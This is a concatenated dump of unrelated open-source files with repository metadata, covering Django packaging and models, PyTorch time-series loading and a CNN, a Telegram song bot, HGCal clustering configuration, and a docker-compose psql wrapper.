from setuptools import setup
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
with open('README.rst', 'r') as f:
README = f.read()
with open('VERSION', 'r') as vfile:
VERSION = vfile.read().strip()
setup(
name='django-excel-response',
version=VERSION,
author='Joey Wilhelm',
author_email='tarkatronic@gmail.com',
license='Apache',
description='Django package to easily render Excel spreadsheets',
long_description=README,
packages=['excel_response'],
include_package_data=True,
url='https://github.com/tarkatronic/django-excel-response',
download_url='https://github.com/tarkatronic/django-excel-response/archive/master.tar.gz',
install_requires=[
'openpyxl>=2.6.1'
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.9',
'Framework :: Django :: 1.10',
'Framework :: Django :: 1.11',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Office/Business :: Financial :: Spreadsheet',
],
zip_safe=False,
test_suite='runtests.runtests'
)
| 33.160714
| 94
| 0.620894
|
1ba5a40dbb20f7fa60a549ebb5de775851386fb9
| 2,505
|
py
|
Python
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 3
|
2016-12-28T08:12:51.000Z
|
2020-07-08T21:03:48.000Z
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 37
|
2016-11-11T09:57:45.000Z
|
2022-03-31T16:04:53.000Z
|
promort/predictions_manager/models.py
|
lucalianas/ProMort
|
63702e1b573025e1f956f7d7a0e829f655e728f9
|
[
"MIT"
] | 4
|
2016-04-22T07:49:40.000Z
|
2021-09-22T08:09:44.000Z
|
# Copyright (c) 2021, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from django.db import models
from django.utils import timezone
from slides_manager.models import Slide
class Prediction(models.Model):
PREDICTION_TYPES = (
('TISSUE', 'Tissue recognition'),
('TUMOR', 'Tumor detection'),
('GLEASON', 'Gleason patterns detection')
)
label = models.CharField(max_length=100, unique=True)
creation_date = models.DateTimeField(auto_now_add=True)
slide = models.ForeignKey(Slide, on_delete=models.PROTECT, blank=False,
related_name='predictions')
type = models.CharField(max_length=7, choices=PREDICTION_TYPES, blank=False, null=False)
omero_id = models.IntegerField(blank=True, null=True, default=None)
provenance = models.TextField(blank=True, null=True)
class TissueFragmentsCollection(models.Model):
prediction = models.ForeignKey(Prediction, on_delete=models.PROTECT, blank=False,
related_name='tissue_fragments')
creation_date = models.DateTimeField(auto_now_add=True)
def get_slide(self):
return self.prediction.slide
class TissueFragment(models.Model):
collection = models.ForeignKey(TissueFragmentsCollection, on_delete=models.PROTECT, blank=False,
related_name='fragments')
shape_json = models.TextField(blank=False)
creation_date = models.DateTimeField(auto_now_add=True)
| 44.732143
| 100
| 0.730539
|
48fa5839e2f2609fe9da1d82791684963b0917ce
| 5,222
|
py
|
Python
|
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
helper/UCR_loader.py
|
akryeem/dtan
|
b8251c3d08f36a0a75083cdb00e21aef27e6e44b
|
[
"MIT"
] | null | null | null |
"""
Created on Oct 2019
author: ronsha
"""
# local
from helper.util import get_dataset_info
import torch
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from tslearn.datasets import UCR_UEA_datasets
import numpy as np
import os
def load_txt_file(datadir, dataset):
'''
Loads UCR text format - useful when working with the data provided by the UCR archivce site.
returns numpy array [N_samples,Width,Channels]
'''
fdir = os.path.join(datadir, dataset)
assert os.path.isdir(fdir), f"{fdir}. {dataset} could not be found in {datadir}"
# again, for file names
f_name = os.path.join(fdir, dataset)
data_train = np.loadtxt(f_name+'_TRAIN',delimiter=',')
data_test_val = np.loadtxt(f_name+'_TEST',delimiter=',')
# get data
X_train = data_train[:,1:]
X_test = data_test_val[:,1:]
# get labels (numerical, not one-hot encoded)
y_train = data_train[:,0]
y_test = data_test_val[:,0]
return X_train, X_test, y_train, y_test
def np_to_dataloader(X, y, batch_size=32, shuffle=True):
X_tensor = torch.Tensor(X)
y_tensor = torch.Tensor(y)
y_tensor = y_tensor.long()
dataset = TensorDataset(X_tensor, y_tensor)
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=2)
return dataloader
def get_train_and_validation_loaders(dataloader, validation_split=0.1, batch_size=32, shuffle=True, rand_seed=42):
'''
    Inspired by: https://stackoverflow.com/a/50544887
Args:
dataloader (torch DataLoader): dataloader torch type
validation_split (float): size of validation set out of the original train set. Default is 0.1
batch_size (int): batch size. Default is 32.
shuffle (bool): default if True.
rand_seed (int): random seed for shuffling. default is 42
Returns:
train_loader, validation_loader
'''
# Creating data indices for training and validation splits:
dataset_size = len(dataloader.dataset)
indices = list(range(dataset_size))
split = int(np.floor(validation_split * dataset_size))
if shuffle:
np.random.seed(rand_seed)
np.random.shuffle(indices)
train_indices, val_indices = indices[split:], indices[:split]
# Creating PT data samplers and loaders:
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(val_indices)
train_loader = torch.utils.data.DataLoader(dataloader.dataset, batch_size=batch_size,
sampler=train_sampler)
validation_loader = torch.utils.data.DataLoader(dataloader.dataset, batch_size=batch_size,
sampler=valid_sampler)
return train_loader, validation_loader
def processed_UCR_data(X_train, X_test, y_train, y_test):
'''
process tslearn UCR datasets for pytorch.
Fixes negative labels and make sure labels are not 1-hot.
Adds channel dim when necessary
Args:
X_train, X_test, y_train, y_test: numpy arrays
X: [N_samples, Width, Channels]
y: [N_samples]
Returns:
numpy array - X_train, X_test, y_train, y_test
'''
# add a third channel for univariate data
if len(X_train.shape) < 3:
X_train = np.expand_dims(X_train, -1)
X_test = np.expand_dims(X_test, -1)
# Fix labels (some UCR datasets have negative labels)
class_names = np.unique(y_train, axis=0)
y_train_tmp = np.zeros(len(y_train))
y_test_tmp = np.zeros(len(y_test))
for i, class_name in enumerate(class_names):
y_train_tmp[y_train == class_name] = i
y_test_tmp[y_test == class_name] = i
# Fixed
y_train = y_train_tmp
y_test = y_test_tmp
# Switch channel dim ()
# Torch data format is [N, C, W] W=timesteps
X_train = np.swapaxes(X_train, 2, 1)
X_test = np.swapaxes(X_test, 2, 1)
return X_train, X_test, y_train, y_test
def get_UCR_data(dataset_name, datadir=0, batch_size=32):
'''
Args:
dataset_name (str): name of the dataset under parent dir 'datadir'
datadir (str): location of data files
batch_size (int): batchsize for torch dataloaders
    Returns:
        train_dataloader, validation_dataloader, test_dataloader (torch DataLoaders)
'''
    if datadir:
X_train, X_test, y_train, y_test = load_txt_file(datadir, dataset_name)
else:
X_train, y_train, X_test, y_test = UCR_UEA_datasets().load_dataset(dataset_name)
X_train, X_test, y_train, y_test = processed_UCR_data(X_train, X_test, y_train, y_test)
input_shape, n_classes = get_dataset_info(dataset_name, X_train, X_test, y_train, y_test, print_info=True)
train_dataloader = np_to_dataloader(X_train, y_train, batch_size, shuffle=True)
train_dataloader, validation_dataloader = get_train_and_validation_loaders(train_dataloader,
validation_split=0.1,
batch_size=batch_size)
test_dataloader = np_to_dataloader(X_test, y_test, batch_size, shuffle=True)
return train_dataloader, validation_dataloader, test_dataloader
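# Illustrative usage sketch (assumes the tslearn UCR cache, or a local text copy
# passed via `datadir`, is available; the dataset name is just an example):
#
#   train_dl, val_dl, test_dl = get_UCR_data('ECGFiveDays', batch_size=64)
#   X_batch, y_batch = next(iter(train_dl))   # X_batch: [N, C, W], y_batch: [N]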
| 34.813333
| 114
| 0.67388
|
3f6b68c29a82962b94c40d4ccfb6f64ddec3ac08
| 1,173
|
py
|
Python
|
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
src/model.py
|
ameya-parab/digit-recognizer
|
3b1f75f702155a7c5556f521244a29209094498e
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
class NeuralNetwork(nn.Module):
def __init__(self):
super(NeuralNetwork, self).__init__()
self.conv1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, stride=1)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1)
self.dropout1 = nn.Dropout2d(p=0.20)
self.dropout2 = nn.Dropout2d(p=0.35)
self.fc1 = nn.Linear(in_features=1024, out_features=256)
self.fc2 = nn.Linear(in_features=256, out_features=64)
self.fc3 = nn.Linear(in_features=64, out_features=10)
def forward(self, data):
data = self.conv1(data)
data = F.leaky_relu(data)
data = F.max_pool2d(data, 2)
data = self.dropout1(data)
data = self.conv2(data)
data = F.leaky_relu(data)
data = F.max_pool2d(data, 2)
data = self.dropout2(data)
data = torch.flatten(data, start_dim=1)
data = self.fc1(data)
data = F.leaky_relu(data)
data = self.fc2(data)
data = F.leaky_relu(data)
output = self.fc3(data)
return output
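# Minimal smoke test (illustrative sketch): assumes 1x28x28 single-channel inputs
# (e.g. MNIST digits), which is what the 1024-unit flatten size corresponds to.
if __name__ == "__main__":
    net = NeuralNetwork()
    dummy = torch.randn(4, 1, 28, 28)    # batch of 4 fake images
    logits = net(dummy)
    print(logits.shape)                  # expected: torch.Size([4, 10])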
| 27.928571
| 88
| 0.623188
|
3712690d22ea0e83e6f520e9058571758115cc9b
| 392
|
py
|
Python
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 55
|
2018-07-04T10:12:15.000Z
|
2022-03-03T19:51:54.000Z
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 6
|
2020-03-24T16:37:46.000Z
|
2021-06-10T21:04:36.000Z
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 32
|
2018-07-10T05:56:31.000Z
|
2021-09-04T23:19:42.000Z
|
from time import time
mx = 2 * 10 ** 7
t = time()
absloop = []
for n in range(mx):
absloop.append(abs(n))
print('for loop: {:.4f} s'.format(time() - t))
t = time()
abslist = [abs(n) for n in range(mx)]
print('list comprehension: {:.4f} s'.format(time() - t))
t = time()
absmap = list(map(abs, range(mx)))
print('map: {:.4f} s'.format(time() - t))
print(absloop == abslist == absmap)
| 19.6
| 56
| 0.591837
|
e9b5f8aa339d2447e0117ff126fda2edac2758fe
| 1,841
|
py
|
Python
|
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
# © @Mr_Dark_Prince
from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from AlexaSongBot.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from AlexaSongBot import app, LOGGER
from AlexaSongBot.mrdarkprince import ignore_blacklisted_users
from AlexaSongBot.sql.chat_sql import add_chat_to_db
start_text = """
Hello [{}](tg://user?id={}),
I am 𝙏𝙍𝙎𝙤𝙣𝙜 👌😳
To download a song, just send me the name of the track you want.
For example: ```/msc Teto - Dia Azul```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
                        text="MY CHANNEL", url="https://www.youtube.com/watch?v=3lUDyq2MfEo&list=RDDsdjqBfTpaI&index=4"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("vi32"))
async def help(client, message):
if message.from_user["id"] in OWNER_ID:
await message.reply(owner_help)
return ""
    text = "Syntax: /msc song name"
await message.reply(text)
OWNER_ID.append(1587091205)
app.start()
LOGGER.info("Your bot is now online.")
idle()
| 29.693548
| 118
| 0.692015
|
c65c1f244360f9fede69c442aa616805d4baeebf
| 6,977
|
py
|
Python
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 3
|
2018-08-24T19:10:26.000Z
|
2019-02-19T11:45:32.000Z
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 3
|
2018-08-23T13:40:24.000Z
|
2019-12-05T21:16:03.000Z
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 5
|
2018-08-21T16:37:52.000Z
|
2020-01-09T13:33:17.000Z
|
import FWCore.ParameterSet.Config as cms
from L1Trigger.L1THGCal.hgcalBackEndLayer2Producer_cfi import distance_C3d_params, \
dbscan_C3d_params, \
histoMax_C3d_params, \
histoMaxVariableDR_C3d_params, \
histoSecondaryMax_C3d_params, \
histoInterpolatedMax_C3d_params, \
histoThreshold_C3d_params, \
neighbour_weights_1stOrder, \
neighbour_weights_2ndOrder
from L1Trigger.L1THGCal.customClustering import set_histomax_params
def create_distance(process, inputs,
distance=distance_C3d_params.dR_multicluster
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = distance_C3d_params.clone(
dR_multicluster = distance
)
return producer
def create_dbscan(process, inputs,
distance=dbscan_C3d_params.dist_dbscan_multicluster,
min_points=dbscan_C3d_params.minN_dbscan_multicluster
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = dbscan_C3d_params.clone(
dist_dbscan_multicluster = distance,
minN_dbscan_multicluster = min_points
)
return producer
def create_histoMax(process, inputs,
distance=histoMax_C3d_params.dR_multicluster,
nBins_R=histoMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoMax_C3d_params.binSumsHisto,
seed_threshold=histoMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoMax_C3d_params.clone()
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoMax_variableDr(process, inputs,
distances=histoMaxVariableDR_C3d_params.dR_multicluster_byLayer_coefficientA,
nBins_R=histoMaxVariableDR_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoMaxVariableDR_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoMaxVariableDR_C3d_params.binSumsHisto,
seed_threshold=histoMaxVariableDR_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoMax_C3d_params.clone(
dR_multicluster_byLayer_coefficientA = distances
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, 0, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoInterpolatedMax1stOrder(process, inputs,
distance=histoInterpolatedMax_C3d_params.dR_multicluster,
nBins_R=histoInterpolatedMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoInterpolatedMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoInterpolatedMax_C3d_params.binSumsHisto,
seed_threshold=histoInterpolatedMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoInterpolatedMax_C3d_params.clone(
neighbour_weights = neighbour_weights_1stOrder
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoInterpolatedMax2ndOrder(process, inputs,
distance=histoInterpolatedMax_C3d_params.dR_multicluster,
nBins_R=histoInterpolatedMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoInterpolatedMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoInterpolatedMax_C3d_params.binSumsHisto,
seed_threshold=histoInterpolatedMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoInterpolatedMax_C3d_params.clone(
neighbour_weights = neighbour_weights_2ndOrder
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoThreshold(process, inputs,
threshold=histoThreshold_C3d_params.threshold_histo_multicluster,
distance=histoThreshold_C3d_params.dR_multicluster,
nBins_R=histoThreshold_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoThreshold_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoThreshold_C3d_params.binSumsHisto
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoThreshold_C3d_params.clone()
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, threshold)
return producer
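# Illustrative usage (a hedged sketch added here, not part of the original
# configuration): each helper above returns a clone of
# hgcalBackEndLayer2Producer, so a customisation function could swap the 3D
# clustering of a process like this, assuming 'hgcalBackEndLayer1Producer' is
# the label of the layer-1 backend module:
#
#   def custom_3d_clustering_histoMax(process, inputs='hgcalBackEndLayer1Producer'):
#       process.hgcalBackEndLayer2Producer = create_histoMax(process, inputs)
#       return process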
| 58.141667
| 128
| 0.638383
|
bee8dcadbb906427555777915e95f1a0a4e1debf
| 3,403
|
py
|
Python
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | 1
|
2018-04-15T22:59:15.000Z
|
2018-04-15T22:59:15.000Z
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/Project-Mochachino
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
"""
Manage figures for pyplot interface.
"""
import sys, gc
import atexit
import traceback
def error_msg(msg):
print(msg, file=sys.stderr)
class Gcf(object):
"""
Singleton to manage a set of integer-numbered figures.
This class is never instantiated; it consists of two class
attributes (a list and a dictionary), and a set of static
methods that operate on those attributes, accessing them
directly as class attributes.
Attributes:
*figs*:
dictionary of the form {*num*: *manager*, ...}
*_activeQue*:
list of *managers*, with active one at the end
"""
_activeQue = []
figs = {}
@staticmethod
def get_fig_manager(num):
"""
If figure manager *num* exists, make it the active
figure and return the manager; otherwise return *None*.
"""
manager = Gcf.figs.get(num, None)
if manager is not None:
Gcf.set_active(manager)
return manager
@staticmethod
def destroy(num):
"""
Try to remove all traces of figure *num*.
In the interactive backends, this is bound to the
window "destroy" and "delete" events.
"""
if not Gcf.has_fignum(num): return
manager = Gcf.figs[num]
manager.canvas.mpl_disconnect(manager._cidgcf)
# There must be a good reason for the following careful
# rebuilding of the activeQue; what is it?
oldQue = Gcf._activeQue[:]
Gcf._activeQue = []
for f in oldQue:
if f != manager:
Gcf._activeQue.append(f)
del Gcf.figs[num]
#print len(Gcf.figs.keys()), len(Gcf._activeQue)
manager.destroy()
gc.collect()
@staticmethod
def destroy_fig(fig):
"*fig* is a Figure instance"
num = None
for manager in Gcf.figs.values():
if manager.canvas.figure == fig:
num = manager.num
break
if num is not None:
Gcf.destroy(num)
@staticmethod
def destroy_all():
for manager in list(Gcf.figs.values()):
manager.canvas.mpl_disconnect(manager._cidgcf)
manager.destroy()
Gcf._activeQue = []
Gcf.figs.clear()
gc.collect()
@staticmethod
def has_fignum(num):
"""
Return *True* if figure *num* exists.
"""
return num in Gcf.figs
@staticmethod
def get_all_fig_managers():
"""
Return a list of figure managers.
"""
return list(Gcf.figs.values())
@staticmethod
def get_num_fig_managers():
"""
Return the number of figures being managed.
"""
return len(list(Gcf.figs.values()))
@staticmethod
def get_active():
"""
Return the manager of the active figure, or *None*.
"""
if len(Gcf._activeQue)==0:
return None
else: return Gcf._activeQue[-1]
@staticmethod
def set_active(manager):
"""
Make the figure corresponding to *manager* the active one.
"""
oldQue = Gcf._activeQue[:]
Gcf._activeQue = []
for m in oldQue:
if m != manager: Gcf._activeQue.append(m)
Gcf._activeQue.append(manager)
Gcf.figs[manager.num] = manager
atexit.register(Gcf.destroy_all)
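# Minimal usage sketch (added for illustration; not part of the original
# module). A hypothetical manager object with the attributes Gcf relies on
# (num, a canvas with mpl_disconnect, and destroy) could be registered,
# queried and removed like this:
#
#   class _DummyCanvas(object):
#       def mpl_disconnect(self, cid):
#           pass
#
#   class _DummyManager(object):
#       def __init__(self, num):
#           self.num = num
#           self.canvas = _DummyCanvas()
#           self._cidgcf = None
#       def destroy(self):
#           pass
#
#   Gcf.set_active(_DummyManager(1))   # registers figure 1 and makes it active
#   assert Gcf.get_active().num == 1
#   Gcf.destroy(1)                     # removes all traces of figure 1 again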
| 24.307143
| 66
| 0.57273
|
03af6247b105ea71c73924af798634c33d945649
| 258
|
py
|
Python
|
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | null | null | null |
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | 1
|
2021-10-14T18:26:56.000Z
|
2021-10-14T18:26:56.000Z
|
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | 1
|
2021-08-06T03:39:55.000Z
|
2021-08-06T03:39:55.000Z
|
count = 0
wrong = []
correct = []
N = int(input())
for i in range(N):
ans = input()
wrong.append(ans)
for i in range(N):
ans = input()
correct.append(ans)
for i in range(N):
if wrong[i] == correct[i]:
count += 1
print(count)
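# Worked example (illustrative only, not part of the submission): with N = 3,
# submitted answers A, B, C and answer key A, X, C, the first and third answers
# match, so the loop above counts 2 and the program prints 2.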
| 12.9
| 30
| 0.546512
|
a3660768f17eff379c6ef4dc1b50f3637302b130
| 4,915
|
py
|
Python
|
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
__version__ = '0.0.2'
from subprocess import call, list2cmdline
import yaml
import argparse
import os
import re
REGEX_ENV_WITH_DEFAULT = re.compile(r'\${(.+):-(.+)}')
def run_postgres(
file,
command,
disable_tty,
docker_compose_command,
print_command,
env_postgres_user,
env_postgres_db,
default_user,
service,
user,
db):
with open(file, 'r') as f:
yml = yaml.safe_load(f)
service_name = service or find_postgres_service(yml)
environment = extract_environment(yml, service_name)
user = user or environment.get(env_postgres_user) or default_user
db = db or environment.get(env_postgres_db) or user
a = [docker_compose_command]
a.extend([] if file == 'docker-compose.yml' else ['-f', file])
a.append('exec')
a.extend(['-T'] if disable_tty else [])
a.append(service_name)
a.append('psql')
a.append('-U')
a.append(user)
a.append(db)
a.extend(['-c', command] if command else [])
if print_command:
print(list2cmdline(a))
else:
call(a)
def find_postgres_service(yml):
for (k, v) in yml.get('services', {}).items():
img = v.get('image')
if img and (img.startswith('postgres:') or img == 'postgres'):  # skip services without an image
return k
return None
def extract_environment(yml, service_name):
service = yml.get('services', {}).get(service_name)
if not service:
raise ValueError(
'service `{}` is not defined in docker-compose file'.format(
service_name))
environment = service.get('environment', None)
if environment:
environment = \
dict([(k, resolve_env(v)) for (k, v) in environment.items()])
if not environment:
env_file = service.get('env_file')
if isinstance(env_file, list):
environment = read_env_files(env_file)
elif isinstance(env_file, str):
environment = read_env_file(env_file)
elif env_file is None:
environment = read_env_file('.env')
else:
raise ValueError('env_file bad format ' + str(env_file))
return environment
def resolve_env(value):
m = REGEX_ENV_WITH_DEFAULT.match(value)
if m:
value = os.environ.get(m[1]) or m[2]
return value
def removeprefix(s, prefix):
if s.startswith(prefix):
return s[len(prefix):]
else:
return s
def split_env_str(s):
return s.split('=', 1)
def read_env_file(path):
with open(path) as f:
lines = f.read().splitlines()
lines = [split_env_str(removeprefix(i, 'export ')) for i in lines]
return dict(lines)
def read_env_files(paths):
e = {}
for path in paths:
e.update(read_env_file(path))
return e
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-c', '--command',
help='run only single command (SQL or internal) and exit')
parser.add_argument(
'-T', default=False, action='store_true',
help='disable pseudo-tty allocation. '
'By default `docker-compose exec` allocates a TTY.')
parser.add_argument(
'--docker-compose-command',
help='path to docker-compose executable. Default `docker-compose`',
default='docker-compose')
parser.add_argument(
'-p',
'--print', dest='print_command',
help='do not call subprocess. Print command only.',
default=False, action='store_true')
parser.add_argument(
'-f', '--file',
help='specify an alternate compose file (default: docker-compose.yml)',
default='docker-compose.yml')
parser.add_argument(
'--env-user',
help='environment variable which defines username. '
'Default `POSTGRES_USER`',
default='POSTGRES_USER')
parser.add_argument(
'--env-db',
help='environment variable which defines dbname. '
'Default `POSTGRES_DB`',
default='POSTGRES_DB')
parser.add_argument(
'--service',
help='specify name of service. Default behaviour is to'
' find service with image name starts with `postgres:`'
)
parser.add_argument('-U', '--username', help='database user name')
parser.add_argument('-d', '--dbname', help='database name')
args = parser.parse_args()
run_postgres(
file=args.file,
command=args.command,
disable_tty=args.T,
docker_compose_command=args.docker_compose_command,
print_command=args.print_command,
env_postgres_user=args.env_user,
env_postgres_db=args.env_db,
default_user='postgres',
service=args.service,
user=args.username,
db=args.dbname
)
if __name__ == '__main__':
main()
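# Illustrative programmatic call (a hedged sketch, not part of the original
# package): run_postgres can be driven directly with the same defaults the CLI
# uses, assuming a docker-compose.yml with a postgres service exists in the
# working directory:
#
#   run_postgres(
#       file='docker-compose.yml', command='SELECT 1;', disable_tty=True,
#       docker_compose_command='docker-compose', print_command=True,
#       env_postgres_user='POSTGRES_USER', env_postgres_db='POSTGRES_DB',
#       default_user='postgres', service=None, user=None, db=None)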
| 28.74269
| 79
| 0.601831
|
52f08f8c5aaf5f9422b54a3505fb2933d8315224
| 5,349
|
py
|
Python
|
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | 3
|
